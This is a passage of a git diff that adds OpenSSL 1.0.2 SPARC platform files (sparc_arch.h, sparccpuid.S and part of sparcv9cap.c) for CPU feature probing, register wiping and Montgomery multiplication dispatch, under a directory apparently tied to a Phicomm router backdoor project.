+# if defined(__SUNPRO_C) && defined(__sparcv9) && !defined(__arch64__)
+#  define __arch64__
+# endif
+
+# define SPARC_PIC_THUNK(reg)    \
+        .align  32;             \
+.Lpic_thunk:                    \
+        jmp     %o7 + 8;        \
+         add    %o7, reg, reg;
+
+# define SPARC_PIC_THUNK_CALL(reg)                       \
+        sethi   %hi(_GLOBAL_OFFSET_TABLE_-4), reg;      \
+        call    .Lpic_thunk;                            \
+         or     reg, %lo(_GLOBAL_OFFSET_TABLE_+4), reg;
+
+# if 1
+#  define SPARC_SETUP_GOT_REG(reg)       SPARC_PIC_THUNK_CALL(reg)
+# else
+#  define SPARC_SETUP_GOT_REG(reg)       \
+        sethi   %hi(_GLOBAL_OFFSET_TABLE_-4), reg;      \
+        call    .+8;                                    \
+        or      reg,%lo(_GLOBAL_OFFSET_TABLE_+4), reg;  \
+        add     %o7, reg, reg
+# endif
+
+# if defined(__arch64__)
+
+#  define SPARC_LOAD_ADDRESS(SYM, reg)   \
+        setx    SYM, %o7, reg;
+#  define LDPTR          ldx
+#  define SIZE_T_CC      %xcc
+#  define STACK_FRAME    192
+#  define STACK_BIAS     2047
+#  define STACK_7thARG   (STACK_BIAS+176)
+
+# else
+
+#  define SPARC_LOAD_ADDRESS(SYM, reg)   \
+        set     SYM, reg;
+#  define LDPTR          ld
+#  define SIZE_T_CC      %icc
+#  define STACK_FRAME    112
+#  define STACK_BIAS     0
+#  define STACK_7thARG   92
+#  define SPARC_LOAD_ADDRESS_LEAF(SYM,reg,tmp) SPARC_LOAD_ADDRESS(SYM,reg)
+
+# endif
+
+# ifdef __PIC__
+#  undef SPARC_LOAD_ADDRESS
+#  undef SPARC_LOAD_ADDRESS_LEAF
+#  define SPARC_LOAD_ADDRESS(SYM, reg)   \
+        SPARC_SETUP_GOT_REG(reg);       \
+        sethi   %hi(SYM), %o7;          \
+        or      %o7, %lo(SYM), %o7;     \
+        LDPTR   [reg + %o7], reg;
+# endif
+
+# ifndef SPARC_LOAD_ADDRESS_LEAF
+#  define SPARC_LOAD_ADDRESS_LEAF(SYM, reg, tmp) \
+        mov     %o7, tmp;                       \
+        SPARC_LOAD_ADDRESS(SYM, reg)            \
+        mov     tmp, %o7;
+# endif
+
+#endif                          /* __SPARC_ARCH_H__ */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sparccpuid.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sparccpuid.S
new file mode 100644
index 0000000..eea2006
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sparccpuid.S
@@ -0,0 +1,529 @@
+#if defined(__SUNPRO_C) && defined(__sparcv9)
+# define ABI64  /* They've said -xarch=v9 at command line */
+#elif defined(__GNUC__) && defined(__arch64__)
+# define ABI64  /* They've said -m64 at command line */
+#endif
+
+#ifdef ABI64
+  .register	%g2,#scratch
+  .register	%g3,#scratch
+# define	FRAME	-192
+# define	BIAS	2047
+#else
+# define	FRAME	-96
+# define	BIAS	0
+#endif
+
+.text
+.align	32
+.global	OPENSSL_wipe_cpu
+.type	OPENSSL_wipe_cpu,#function
+! Keep in mind that this does not excuse us from wiping the stack!
+! This routine wipes registers, but not the backing store [which
+! resides on the stack, toward lower addresses]. To facilitate for
+! stack wiping I return pointer to the top of stack of the *caller*.
+OPENSSL_wipe_cpu:
+	save	%sp,FRAME,%sp
+	nop
+#ifdef __sun
+#include <sys/trap.h>
+	ta	ST_CLEAN_WINDOWS
+#else
+	call	.walk.reg.wins
+#endif
+	nop
+	call	.PIC.zero.up
+	mov	.zero-(.-4),%o0
+	ld	[%o0],%f0
+	ld	[%o0],%f1
+
+	subcc	%g0,1,%o0
+	! Following is V9 "rd %ccr,%o0" instruction. However! V8
+	! specification says that it ("rd %asr2,%o0" in V8 terms) does
+	! not cause illegal_instruction trap. It therefore can be used
+	! to determine if the CPU the code is executing on is V8- or
+	! V9-compliant, as V9 returns a distinct value of 0x99,
+	! "negative" and "borrow" bits set in both %icc and %xcc.
+	.word	0x91408000	!rd	%ccr,%o0
+	cmp	%o0,0x99
+	bne	.v8
+	nop
+			! Even though we do not use %fp register bank,
+			! we wipe it as memcpy might have used it...
+			.word	0xbfa00040	!fmovd	%f0,%f62
+			.word	0xbba00040	!...
+			.word	0xb7a00040
+			.word	0xb3a00040
+			.word	0xafa00040
+			.word	0xaba00040
+			.word	0xa7a00040
+			.word	0xa3a00040
+			.word	0x9fa00040
+			.word	0x9ba00040
+			.word	0x97a00040
+			.word	0x93a00040
+			.word	0x8fa00040
+			.word	0x8ba00040
+			.word	0x87a00040
+			.word	0x83a00040	!fmovd	%f0,%f32
+.v8:			fmovs	%f1,%f31
+	clr	%o0
+			fmovs	%f0,%f30
+	clr	%o1
+			fmovs	%f1,%f29
+	clr	%o2
+			fmovs	%f0,%f28
+	clr	%o3
+			fmovs	%f1,%f27
+	clr	%o4
+			fmovs	%f0,%f26
+	clr	%o5
+			fmovs	%f1,%f25
+	clr	%o7
+			fmovs	%f0,%f24
+	clr	%l0
+			fmovs	%f1,%f23
+	clr	%l1
+			fmovs	%f0,%f22
+	clr	%l2
+			fmovs	%f1,%f21
+	clr	%l3
+			fmovs	%f0,%f20
+	clr	%l4
+			fmovs	%f1,%f19
+	clr	%l5
+			fmovs	%f0,%f18
+	clr	%l6
+			fmovs	%f1,%f17
+	clr	%l7
+			fmovs	%f0,%f16
+	clr	%i0
+			fmovs	%f1,%f15
+	clr	%i1
+			fmovs	%f0,%f14
+	clr	%i2
+			fmovs	%f1,%f13
+	clr	%i3
+			fmovs	%f0,%f12
+	clr	%i4
+			fmovs	%f1,%f11
+	clr	%i5
+			fmovs	%f0,%f10
+	clr	%g1
+			fmovs	%f1,%f9
+	clr	%g2
+			fmovs	%f0,%f8
+	clr	%g3
+			fmovs	%f1,%f7
+	clr	%g4
+			fmovs	%f0,%f6
+	clr	%g5
+			fmovs	%f1,%f5
+			fmovs	%f0,%f4
+			fmovs	%f1,%f3
+			fmovs	%f0,%f2
+
+	add	%fp,BIAS,%i0	! return pointer to caller´s top of stack
+
+	ret
+	restore
+
+.zero:	.long	0x0,0x0
+.PIC.zero.up:
+	retl
+	add	%o0,%o7,%o0
+#ifdef DEBUG
+.global	walk_reg_wins
+.type	walk_reg_wins,#function
+walk_reg_wins:
+#endif
+.walk.reg.wins:
+	save	%sp,FRAME,%sp
+	cmp	%i7,%o7
+	be	2f
+	clr	%o0
+	cmp	%o7,0	! compiler never cleans %o7...
+	be	1f	! could have been a leaf function...
+	clr	%o1
+	call	.walk.reg.wins
+	nop
+1:	clr	%o2
+	clr	%o3
+	clr	%o4
+	clr	%o5
+	clr	%o7
+	clr	%l0
+	clr	%l1
+	clr	%l2
+	clr	%l3
+	clr	%l4
+	clr	%l5
+	clr	%l6
+	clr	%l7
+	add	%o0,1,%i0	! used for debugging
+2:	ret
+	restore
+.size	OPENSSL_wipe_cpu,.-OPENSSL_wipe_cpu
+
+.global	OPENSSL_atomic_add
+.type	OPENSSL_atomic_add,#function
+.align	32
+OPENSSL_atomic_add:
+#ifndef ABI64
+	subcc	%g0,1,%o2
+	.word	0x95408000	!rd	%ccr,%o2, see comment above
+	cmp	%o2,0x99
+	be	.v9
+	nop
+	save	%sp,FRAME,%sp
+	ba	.enter
+	nop
+#ifdef __sun
+! Note that you do not have to link with libthread to call thr_yield,
+! as libc provides a stub, which is overloaded the moment you link
+! with *either* libpthread or libthread...
+#define	YIELD_CPU	thr_yield
+#else
+! applies at least to Linux and FreeBSD... Feedback expected...
+#define	YIELD_CPU	sched_yield
+#endif
+.spin:	call	YIELD_CPU
+	nop
+.enter:	ld	[%i0],%i2
+	cmp	%i2,-4096
+	be	.spin
+	mov	-1,%i2
+	swap	[%i0],%i2
+	cmp	%i2,-1
+	be	.spin
+	add	%i2,%i1,%i2
+	stbar
+	st	%i2,[%i0]
+	sra	%i2,%g0,%i0
+	ret
+	restore
+.v9:
+#endif
+	ld	[%o0],%o2
+1:	add	%o1,%o2,%o3
+	.word	0xd7e2100a	!cas [%o0],%o2,%o3, compare [%o0] with %o2 and swap %o3
+	cmp	%o2,%o3
+	bne	1b
+	mov	%o3,%o2		! cas is always fetching to dest. register
+	add	%o1,%o2,%o0	! OpenSSL expects the new value
+	retl
+	sra	%o0,%g0,%o0	! we return signed int, remember?
+.size	OPENSSL_atomic_add,.-OPENSSL_atomic_add
+
+.global	_sparcv9_rdtick
+.align	32
+_sparcv9_rdtick:
+	subcc	%g0,1,%o0
+	.word	0x91408000	!rd	%ccr,%o0
+	cmp	%o0,0x99
+	bne	.notick
+	xor	%o0,%o0,%o0
+	.word	0x91410000	!rd	%tick,%o0
+	retl
+	.word	0x93323020	!srlx	%o0,32,%o1
+.notick:
+	retl
+	xor	%o1,%o1,%o1
+.type	_sparcv9_rdtick,#function
+.size	_sparcv9_rdtick,.-_sparcv9_rdtick
+
+.global	_sparcv9_vis1_probe
+.align	8
+_sparcv9_vis1_probe:
+	add	%sp,BIAS+2,%o1
+	.word	0xc19a5a40	!ldda	[%o1]ASI_FP16_P,%f0
+	retl
+	.word	0x81b00d80	!fxor	%f0,%f0,%f0
+.type	_sparcv9_vis1_probe,#function
+.size	_sparcv9_vis1_probe,.-_sparcv9_vis1_probe
+
+! Probe and instrument VIS1 instruction. Output is number of cycles it
+! takes to execute rdtick and pair of VIS1 instructions. US-Tx VIS unit
+! is slow (documented to be 6 cycles on T2) and the core is in-order
+! single-issue, it should be possible to distinguish Tx reliably...
+! Observed return values are:
+!
+!	UltraSPARC IIe		7
+!	UltraSPARC III		7
+!	UltraSPARC T1		24
+!	SPARC T4		65(*)
+!
+! (*)	result has lesser to do with VIS instruction latencies, rdtick
+!	appears that slow, but it does the trick in sense that FP and
+!	VIS code paths are still slower than integer-only ones.
+!
+! Numbers for T2 and SPARC64 V-VII are more than welcomed.
+!
+! It would be possible to detect specifically US-T1 by instrumenting
+! fmul8ulx16, which is emulated on T1 and as such accounts for quite
+! a lot of %tick-s, couple of thousand on Linux...
+.global	_sparcv9_vis1_instrument
+.align	8
+_sparcv9_vis1_instrument:
+	.word	0x81b00d80	!fxor	%f0,%f0,%f0
+	.word	0x85b08d82	!fxor	%f2,%f2,%f2
+	.word	0x91410000	!rd	%tick,%o0
+	.word	0x81b00d80	!fxor	%f0,%f0,%f0
+	.word	0x85b08d82	!fxor	%f2,%f2,%f2
+	.word	0x93410000	!rd	%tick,%o1
+	.word	0x81b00d80	!fxor	%f0,%f0,%f0
+	.word	0x85b08d82	!fxor	%f2,%f2,%f2
+	.word	0x95410000	!rd	%tick,%o2
+	.word	0x81b00d80	!fxor	%f0,%f0,%f0
+	.word	0x85b08d82	!fxor	%f2,%f2,%f2
+	.word	0x97410000	!rd	%tick,%o3
+	.word	0x81b00d80	!fxor	%f0,%f0,%f0
+	.word	0x85b08d82	!fxor	%f2,%f2,%f2
+	.word	0x99410000	!rd	%tick,%o4
+
+	! calculate intervals
+	sub	%o1,%o0,%o0
+	sub	%o2,%o1,%o1
+	sub	%o3,%o2,%o2
+	sub	%o4,%o3,%o3
+
+	! find minumum value
+	cmp	%o0,%o1
+	.word	0x38680002	!bgu,a	%xcc,.+8
+	mov	%o1,%o0
+	cmp	%o0,%o2
+	.word	0x38680002	!bgu,a	%xcc,.+8
+	mov	%o2,%o0
+	cmp	%o0,%o3
+	.word	0x38680002	!bgu,a	%xcc,.+8
+	mov	%o3,%o0
+
+	retl
+	nop
+.type	_sparcv9_vis1_instrument,#function
+.size	_sparcv9_vis1_instrument,.-_sparcv9_vis1_instrument
+
+.global	_sparcv9_vis2_probe
+.align	8
+_sparcv9_vis2_probe:
+	retl
+	.word	0x81b00980	!bshuffle	%f0,%f0,%f0
+.type	_sparcv9_vis2_probe,#function
+.size	_sparcv9_vis2_probe,.-_sparcv9_vis2_probe
+
+.global	_sparcv9_fmadd_probe
+.align	8
+_sparcv9_fmadd_probe:
+	.word	0x81b00d80	!fxor	%f0,%f0,%f0
+	.word	0x85b08d82	!fxor	%f2,%f2,%f2
+	retl
+	.word	0x81b80440	!fmaddd	%f0,%f0,%f2,%f0
+.type	_sparcv9_fmadd_probe,#function
+.size	_sparcv9_fmadd_probe,.-_sparcv9_fmadd_probe
+
+.global	_sparcv9_rdcfr
+.align	8
+_sparcv9_rdcfr:
+	retl
+	.word	0x91468000	!rd	%asr26,%o0
+.type	_sparcv9_rdcfr,#function
+.size	_sparcv9_rdcfr,.-_sparcv9_rdcfr
+
+.global	_sparcv9_vis3_probe
+.align	8
+_sparcv9_vis3_probe:
+	retl
+	.word	0x81b022a0	!xmulx	%g0,%g0,%g0
+.type	_sparcv9_vis3_probe,#function
+.size	_sparcv9_vis3_probe,.-_sparcv9_vis3_probe
+
+.global	_sparcv9_random
+.align	8
+_sparcv9_random:
+	retl
+	.word	0x91b002a0	!random	%o0
+.type	_sparcv9_random,#function
+.size	_sparcv9_random,.-_sparcv9_vis3_probe
+
+.global	OPENSSL_cleanse
+.align	32
+OPENSSL_cleanse:
+	cmp	%o1,14
+	nop
+#ifdef ABI64
+	bgu	%xcc,.Lot
+#else
+	bgu	.Lot
+#endif
+	cmp	%o1,0
+	bne	.Little
+	nop
+	retl
+	nop
+
+.Little:
+	stb	%g0,[%o0]
+	subcc	%o1,1,%o1
+	bnz	.Little
+	add	%o0,1,%o0
+	retl
+	nop
+.align	32
+.Lot:
+#ifndef ABI64
+	subcc	%g0,1,%g1
+	! see above for explanation
+	.word	0x83408000	!rd	%ccr,%g1
+	cmp	%g1,0x99
+	bne	.v8lot
+	nop
+#endif
+
+.v9lot:	andcc	%o0,7,%g0
+	bz	.v9aligned
+	nop
+	stb	%g0,[%o0]
+	sub	%o1,1,%o1
+	ba	.v9lot
+	add	%o0,1,%o0
+.align	16,0x01000000
+.v9aligned:
+	.word	0xc0720000	!stx	%g0,[%o0]
+	sub	%o1,8,%o1
+	andcc	%o1,-8,%g0
+#ifdef ABI64
+	.word	0x126ffffd	!bnz	%xcc,.v9aligned
+#else
+	.word	0x124ffffd	!bnz	%icc,.v9aligned
+#endif
+	add	%o0,8,%o0
+
+	cmp	%o1,0
+	bne	.Little
+	nop
+	retl
+	nop
+#ifndef ABI64
+.v8lot:	andcc	%o0,3,%g0
+	bz	.v8aligned
+	nop
+	stb	%g0,[%o0]
+	sub	%o1,1,%o1
+	ba	.v8lot
+	add	%o0,1,%o0
+	nop
+.v8aligned:
+	st	%g0,[%o0]
+	sub	%o1,4,%o1
+	andcc	%o1,-4,%g0
+	bnz	.v8aligned
+	add	%o0,4,%o0
+
+	cmp	%o1,0
+	bne	.Little
+	nop
+	retl
+	nop
+#endif
+.type	OPENSSL_cleanse,#function
+.size	OPENSSL_cleanse,.-OPENSSL_cleanse
+
+.global	_sparcv9_vis1_instrument_bus
+.align	8
+_sparcv9_vis1_instrument_bus:
+	mov	%o1,%o3					! save cnt
+	.word	0x99410000	!rd	%tick,%o4	! tick
+	mov	%o4,%o5					! lasttick = tick
+	set	0,%g4					! diff
+
+	andn	%o0,63,%g1
+	.word	0xc1985e00	!ldda	[%g1]0xf0,%f0	! block load
+	.word	0x8143e040	!membar	#Sync
+	.word	0xc1b85c00	!stda	%f0,[%g1]0xe0	! block store and commit
+	.word	0x8143e040	!membar	#Sync
+	ld	[%o0],%o4
+	add	%o4,%g4,%g4
+	.word	0xc9e2100c	!cas	[%o0],%o4,%g4
+
+.Loop:	.word	0x99410000	!rd	%tick,%o4
+	sub	%o4,%o5,%g4				! diff=tick-lasttick
+	mov	%o4,%o5					! lasttick=tick
+
+	andn	%o0,63,%g1
+	.word	0xc1985e00	!ldda	[%g1]0xf0,%f0	! block load
+	.word	0x8143e040	!membar	#Sync
+	.word	0xc1b85c00	!stda	%f0,[%g1]0xe0	! block store and commit
+	.word	0x8143e040	!membar	#Sync
+	ld	[%o0],%o4
+	add	%o4,%g4,%g4
+	.word	0xc9e2100c	!cas	[%o0],%o4,%g4
+	subcc	%o1,1,%o1				! --$cnt
+	bnz	.Loop
+	add	%o0,4,%o0				! ++$out
+
+	retl
+	mov	%o3,%o0
+.type	_sparcv9_vis1_instrument_bus,#function
+.size	_sparcv9_vis1_instrument_bus,.-_sparcv9_vis1_instrument_bus
+
+.global	_sparcv9_vis1_instrument_bus2
+.align	8
+_sparcv9_vis1_instrument_bus2:
+	mov	%o1,%o3					! save cnt
+	sll	%o1,2,%o1				! cnt*=4
+
+	.word	0x99410000	!rd	%tick,%o4	! tick
+	mov	%o4,%o5					! lasttick = tick
+	set	0,%g4					! diff
+
+	andn	%o0,63,%g1
+	.word	0xc1985e00	!ldda	[%g1]0xf0,%f0	! block load
+	.word	0x8143e040	!membar	#Sync
+	.word	0xc1b85c00	!stda	%f0,[%g1]0xe0	! block store and commit
+	.word	0x8143e040	!membar	#Sync
+	ld	[%o0],%o4
+	add	%o4,%g4,%g4
+	.word	0xc9e2100c	!cas	[%o0],%o4,%g4
+
+	.word	0x99410000	!rd	%tick,%o4	! tick
+	sub	%o4,%o5,%g4				! diff=tick-lasttick
+	mov	%o4,%o5					! lasttick=tick
+	mov	%g4,%g5					! lastdiff=diff
+.Loop2:
+	andn	%o0,63,%g1
+	.word	0xc1985e00	!ldda	[%g1]0xf0,%f0	! block load
+	.word	0x8143e040	!membar	#Sync
+	.word	0xc1b85c00	!stda	%f0,[%g1]0xe0	! block store and commit
+	.word	0x8143e040	!membar	#Sync
+	ld	[%o0],%o4
+	add	%o4,%g4,%g4
+	.word	0xc9e2100c	!cas	[%o0],%o4,%g4
+
+	subcc	%o2,1,%o2				! --max
+	bz	.Ldone2
+	nop
+
+	.word	0x99410000	!rd	%tick,%o4	! tick
+	sub	%o4,%o5,%g4				! diff=tick-lasttick
+	mov	%o4,%o5					! lasttick=tick
+	cmp	%g4,%g5
+	mov	%g4,%g5					! lastdiff=diff
+
+	.word	0x83408000	!rd	%ccr,%g1
+	and	%g1,4,%g1				! isolate zero flag
+	xor	%g1,4,%g1				! flip zero flag
+
+	subcc	%o1,%g1,%o1				! conditional --$cnt
+	bnz	.Loop2
+	add	%o0,%g1,%o0				! conditional ++$out
+
+.Ldone2:
+	srl	%o1,2,%o1
+	retl
+	sub	%o3,%o1,%o0
+.type	_sparcv9_vis1_instrument_bus2,#function
+.size	_sparcv9_vis1_instrument_bus2,.-_sparcv9_vis1_instrument_bus2
+
+.section	".init",#alloc,#execinstr
+	call	OPENSSL_cpuid_setup
+	nop
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sparcv9cap.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sparcv9cap.c
new file mode 100644
index 0000000..8bf2846
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sparcv9cap.c
@@ -0,0 +1,346 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <setjmp.h>
+#include <signal.h>
+#include <sys/time.h>
+#include <unistd.h>
+#include <openssl/bn.h>
+
+#include "sparc_arch.h"
+
+#if defined(__GNUC__) && defined(__linux)
+__attribute__ ((visibility("hidden")))
+#endif
+unsigned int OPENSSL_sparcv9cap_P[2] = { SPARCV9_TICK_PRIVILEGED, 0 };
+
+int bn_mul_mont(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                const BN_ULONG *np, const BN_ULONG *n0, int num)
+{
+    int bn_mul_mont_vis3(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                         const BN_ULONG *np, const BN_ULONG *n0, int num);
+    int bn_mul_mont_fpu(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                        const BN_ULONG *np, const BN_ULONG *n0, int num);
+    int bn_mul_mont_int(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                        const BN_ULONG *np, const BN_ULONG *n0, int num);
+
+    if (!(num & 1) && num >= 6) {
+        if ((num & 15) == 0 && num <= 64 &&
+            (OPENSSL_sparcv9cap_P[1] & (CFR_MONTMUL | CFR_MONTSQR)) ==
+            (CFR_MONTMUL | CFR_MONTSQR)) {
+            typedef int (*bn_mul_mont_f) (BN_ULONG *rp, const BN_ULONG *ap,
+                                          const BN_ULONG *bp,
+                                          const BN_ULONG *np,
+                                          const BN_ULONG *n0);
+            int bn_mul_mont_t4_8(BN_ULONG *rp, const BN_ULONG *ap,
+                                 const BN_ULONG *bp, const BN_ULONG *np,
+                                 const BN_ULONG *n0);
+            int bn_mul_mont_t4_16(BN_ULONG *rp, const BN_ULONG *ap,
+                                  const BN_ULONG *bp, const BN_ULONG *np,
+                                  const BN_ULONG *n0);
+            int bn_mul_mont_t4_24(BN_ULONG *rp, const BN_ULONG *ap,
+                                  const BN_ULONG *bp, const BN_ULONG *np,
+                                  const BN_ULONG *n0);
+            int bn_mul_mont_t4_32(BN_ULONG *rp, const BN_ULONG *ap,
+                                  const BN_ULONG *bp, const BN_ULONG *np,
+                                  const BN_ULONG *n0);
+            static const bn_mul_mont_f funcs[4] = {
+                bn_mul_mont_t4_8, bn_mul_mont_t4_16,
+                bn_mul_mont_t4_24, bn_mul_mont_t4_32
+            };
+            bn_mul_mont_f worker = funcs[num / 16 - 1];
+
+            if ((*worker) (rp, ap, bp, np, n0))
+                return 1;
+            /* retry once and fall back */
+            if ((*worker) (rp, ap, bp, np, n0))
+                return 1;
+            return bn_mul_mont_vis3(rp, ap, bp, np, n0, num);
+        }
+        if ((OPENSSL_sparcv9cap_P[0] & SPARCV9_VIS3))
+            return bn_mul_mont_vis3(rp, ap, bp, np, n0, num);
+        else if (num >= 8 &&
+                 (OPENSSL_sparcv9cap_P[0] &
+                  (SPARCV9_PREFER_FPU | SPARCV9_VIS1)) ==
+                 (SPARCV9_PREFER_FPU | SPARCV9_VIS1))
+            return bn_mul_mont_fpu(rp, ap, bp, np, n0, num);
+    }
+    return bn_mul_mont_int(rp, ap, bp, np, n0, num);
+}
+
+unsigned long _sparcv9_rdtick(void);
+void _sparcv9_vis1_probe(void);
+unsigned long _sparcv9_vis1_instrument(void);
+void _sparcv9_vis2_probe(void);
+void _sparcv9_fmadd_probe(void);
+unsigned long _sparcv9_rdcfr(void);
+void _sparcv9_vis3_probe(void);
+unsigned long _sparcv9_random(void);
+size_t _sparcv9_vis1_instrument_bus(unsigned int *, size_t);
+size_t _sparcv9_vis1_instrument_bus2(unsigned int *, size_t, size_t);
+
+unsigned long OPENSSL_rdtsc(void)
+{
+    if (OPENSSL_sparcv9cap_P[0] & SPARCV9_TICK_PRIVILEGED)
+#if defined(__sun) && defined(__SVR4)
+        return gethrtime();
+#else
+        return 0;
+#endif
+    else
+        return _sparcv9_rdtick();
+}
+
+size_t OPENSSL_instrument_bus(unsigned int *out, size_t cnt)
+{
+    if ((OPENSSL_sparcv9cap_P[0] & (SPARCV9_TICK_PRIVILEGED | SPARCV9_BLK)) ==
+        SPARCV9_BLK)
+        return _sparcv9_vis1_instrument_bus(out, cnt);
+    else
+        return 0;
+}
+
+size_t OPENSSL_instrument_bus2(unsigned int *out, size_t cnt, size_t max)
+{
+    if ((OPENSSL_sparcv9cap_P[0] & (SPARCV9_TICK_PRIVILEGED | SPARCV9_BLK)) ==
+        SPARCV9_BLK)
+        return _sparcv9_vis1_instrument_bus2(out, cnt, max);
+    else
+        return 0;
+}
+
+#if 0 && defined(__sun) && defined(__SVR4)
+/*
+ * This code path is disabled, because of incompatibility of libdevinfo.so.1
+ * and libmalloc.so.1 (see below for details)
+ */
+# include <malloc.h>
+# include <dlfcn.h>
+# include <libdevinfo.h>
+# include <sys/systeminfo.h>
+
+typedef di_node_t(*di_init_t) (const char *, uint_t);
+typedef void (*di_fini_t) (di_node_t);
+typedef char *(*di_node_name_t) (di_node_t);
+typedef int (*di_walk_node_t) (di_node_t, uint_t, di_node_name_t,
+                               int (*)(di_node_t, di_node_name_t));
+
+# define DLLINK(h,name) (name=(name##_t)dlsym((h),#name))
+
+static int walk_nodename(di_node_t node, di_node_name_t di_node_name)
+{
+    char *name = (*di_node_name) (node);
+
+    /* This is expected to catch all UltraSPARC flavors prior T1 */
+    if (!strcmp(name, "SUNW,UltraSPARC") ||
+        /* covers II,III,IV */
+        !strncmp(name, "SUNW,UltraSPARC-I", 17)) {
+        OPENSSL_sparcv9cap_P[0] |= SPARCV9_PREFER_FPU | SPARCV9_VIS1;
+
+        /* %tick is privileged only on UltraSPARC-I/II, but not IIe */
+        if (name[14] != '\0' && name[17] != '\0' && name[18] != '\0')
+            OPENSSL_sparcv9cap_P[0] &= ~SPARCV9_TICK_PRIVILEGED;
+
+        return DI_WALK_TERMINATE;
+    }
+    /* This is expected to catch remaining UltraSPARCs, such as T1 */
+    else if (!strncmp(name, "SUNW,UltraSPARC", 15)) {
+        OPENSSL_sparcv9cap_P[0] &= ~SPARCV9_TICK_PRIVILEGED;
+
+        return DI_WALK_TERMINATE;
+    }
+
+    return DI_WALK_CONTINUE;
+}
+
+void OPENSSL_cpuid_setup(void)
+{
+    void *h;
+    char *e, si[256];
+    static int trigger = 0;
+
+    if (trigger)
+        return;
+    trigger = 1;
+
+    if ((e = getenv("OPENSSL_sparcv9cap"))) {
+        OPENSSL_sparcv9cap_P[0] = strtoul(e, NULL, 0);
+        return;
+    }
+
+    if (sysinfo(SI_MACHINE, si, sizeof(si)) > 0) {
+        if (strcmp(si, "sun4v"))
+            /* FPU is preferred for all CPUs, but US-T1/2 */
+            OPENSSL_sparcv9cap_P[0] |= SPARCV9_PREFER_FPU;
+    }
+
+    if (sysinfo(SI_ISALIST, si, sizeof(si)) > 0) {
+        if (strstr(si, "+vis"))
+            OPENSSL_sparcv9cap_P[0] |= SPARCV9_VIS1 | SPARCV9_BLK;
+        if (strstr(si, "+vis2")) {
+            OPENSSL_sparcv9cap_P[0] |= SPARCV9_VIS2;
+            OPENSSL_sparcv9cap_P[0] &= ~SPARCV9_TICK_PRIVILEGED;
+            return;
+        }
+    }
+# ifdef M_KEEP
+    /*
+     * Solaris libdevinfo.so.1 is effectively incomatible with
+     * libmalloc.so.1. Specifically, if application is linked with
+     * -lmalloc, it crashes upon startup with SIGSEGV in
+     * free(3LIBMALLOC) called by di_fini. Prior call to
+     * mallopt(M_KEEP,0) somehow helps... But not always...
+     */
+    if ((h = dlopen(NULL, RTLD_LAZY))) {
+        union {
+            void *p;
+            int (*f) (int, int);
+        } sym;
+        if ((sym.p = dlsym(h, "mallopt")))
+            (*sym.f) (M_KEEP, 0);
+        dlclose(h);
+    }
+# endif
+    if ((h = dlopen("libdevinfo.so.1", RTLD_LAZY)))
+        do {
+            di_init_t di_init;
+            di_fini_t di_fini;
+            di_walk_node_t di_walk_node;
+            di_node_name_t di_node_name;
+            di_node_t root_node;
+
+            if (!DLLINK(h, di_init))
+                break;
+            if (!DLLINK(h, di_fini))
+                break;
+            if (!DLLINK(h, di_walk_node))
+                break;
+            if (!DLLINK(h, di_node_name))
+                break;
+
+            if ((root_node = (*di_init) ("/", DINFOSUBTREE)) != DI_NODE_NIL) {
+                (*di_walk_node) (root_node, DI_WALK_SIBFIRST,
+                                 di_node_name, walk_nodename);
+                (*di_fini) (root_node);
+            }
+        } while (0);
+
+    if (h)
+        dlclose(h);
+}
+
+#else
+
+static sigjmp_buf common_jmp;
+static void common_handler(int sig)
+{
+    siglongjmp(common_jmp, sig);
+}
+
+void OPENSSL_cpuid_setup(void)
+{
+    char *e;
+    struct sigaction common_act, ill_oact, bus_oact;
+    sigset_t all_masked, oset;
+    static int trigger = 0;
+
+    if (trigger)
+        return;
+    trigger = 1;
+
+    if ((e = getenv("OPENSSL_sparcv9cap"))) {
+        OPENSSL_sparcv9cap_P[0] = strtoul(e, NULL, 0);
+        if ((e = strchr(e, ':')))
+            OPENSSL_sparcv9cap_P[1] = strtoul(e + 1, NULL, 0);
+        return;
+    }
+
+    /* Initial value, fits UltraSPARC-I&II... */
+    OPENSSL_sparcv9cap_P[0] = SPARCV9_PREFER_FPU | SPARCV9_TICK_PRIVILEGED;
+
+    sigfillset(&all_masked);
+    sigdelset(&all_masked, SIGILL);
+    sigdelset(&all_masked, SIGTRAP);
+# ifdef SIGEMT
+    sigdelset(&all_masked, SIGEMT);
+# endif
+    sigdelset(&all_masked, SIGFPE);
+    sigdelset(&all_masked, SIGBUS);
+    sigdelset(&all_masked, SIGSEGV);
+    sigprocmask(SIG_SETMASK, &all_masked, &oset);
+
+    memset(&common_act, 0, sizeof(common_act));
+    common_act.sa_handler = common_handler;
+    common_act.sa_mask = all_masked;
+
+    sigaction(SIGILL, &common_act, &ill_oact);
+    sigaction(SIGBUS, &common_act, &bus_oact); /* T1 fails 16-bit ldda [on
+                                                * Linux] */
+
+    if (sigsetjmp(common_jmp, 1) == 0) {
+        _sparcv9_rdtick();
+        OPENSSL_sparcv9cap_P[0] &= ~SPARCV9_TICK_PRIVILEGED;
+    }
+
+    if (sigsetjmp(common_jmp, 1) == 0) {
+        _sparcv9_vis1_probe();
+        OPENSSL_sparcv9cap_P[0] |= SPARCV9_VIS1 | SPARCV9_BLK;
+        /* detect UltraSPARC-Tx, see sparccpud.S for details... */
+        if (_sparcv9_vis1_instrument() >= 12)
+            OPENSSL_sparcv9cap_P[0] &= ~(SPARCV9_VIS1 | SPARCV9_PREFER_FPU);
+        else {
+            _sparcv9_vis2_probe();
+            OPENSSL_sparcv9cap_P[0] |= SPARCV9_VIS2;
+        }
+    }
+
+    if (sigsetjmp(common_jmp, 1) == 0) {
+        _sparcv9_fmadd_probe();
+        OPENSSL_sparcv9cap_P[0] |= SPARCV9_FMADD;
+    }
+
+    /*
+     * VIS3 flag is tested independently from VIS1, unlike VIS2 that is,
